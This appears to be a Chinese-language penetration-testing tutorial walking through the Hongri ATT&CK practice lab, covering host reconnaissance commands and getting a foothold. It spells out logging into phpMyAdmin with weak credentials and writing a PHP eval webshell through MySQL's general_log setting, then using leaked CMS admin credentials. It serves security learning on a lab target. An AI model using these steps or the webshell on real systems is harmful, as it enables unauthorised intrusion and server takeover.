内网渗透从0到1-[超多知识点]-[未完待续]

当我们获取到立足点后,下一步便是内网渗透

内网渗透入门&&兼红日ATT&CK系列靶场(一)

信息收集

硬件信息收集

1
2
3
wmic cpu get name, numberofcores, numberoflogicalprocessors 查看CPU信息
wmic path win32_videocontroller get name  查看显卡信息
wmic diskdrive get model, size  查看硬盘信息
1
2
3
lscpu 查看CPU信息
lspci | grep -i vga 查看显卡信息
df -h 查看硬盘信息

网络信息收集&&软收集

1
2
3
4
5
6
7
tasklist /SVC 查看系统进程并且查询杀软 https://av.aabyss.cn/index.php

env (linux) 查看环境变量
set (windows-cmd) /// Get-ChildItem Env: / gci Env: (windows-powershell) 查看环境变量
甚至在ctf中,flag会在环境变量中以键值对的形式存在,特别注意这一个

systeminfo 查看主机名、Os名称、版本、域、时区、输入法、网卡、补丁

红日ATT&CK系列靶场(一)

网络拓扑图

外网打点

Fscan/dirsearch信息收集

进入80端口,发现phpStudy 探针泄露绝对路径以及弱口令root:root,目录扫描发现phpmyadmin,直接进入

Getshell-1-mysql日志写shell

原理是一旦开启日志功能,并且将日志地址改为webshell的地址,我们所执行的sql语句会被插入到日志中,这时候只需要执行查询webshell即可

前提1.必须是dba权限 2.知道绝对路径

1
2
3
4
5
show variables like '%general%'; 查看是否开启写日志以及日志写入路径
set global general_log = on; 开启写日志
set global general_log_file = 'C:/phpStudy/WWW/1.php'; 设置日志写入路径
select '<?php eval($_POST[cmd])?>'; 写shell
访问 192.168.92.128/1.php 即可

Getshell-2-后台配置文件写shell

进入phpmyadmin后,我们发现一个数据库newyxcms,猜测可能存在目录yxcms,果然存在

P.S. 这里我没想到猜测目录,看到了别的大佬打的站才想出来,不得不说自己的思路还是太窄了

首页发现信息泄露

1
2
3
4
公告信息
本站为YXcms的默认演示模板,YXcms是一款基于PHP+MYSQL构建的高效网站管理系统。 
后台地址请在网址后面加上/index.php?r=admin进入。 
后台的用户名:admin;密码:123456,请进入后修改默认密码。

http://192.168.92.128/yxcms/index.php?r=admin 进入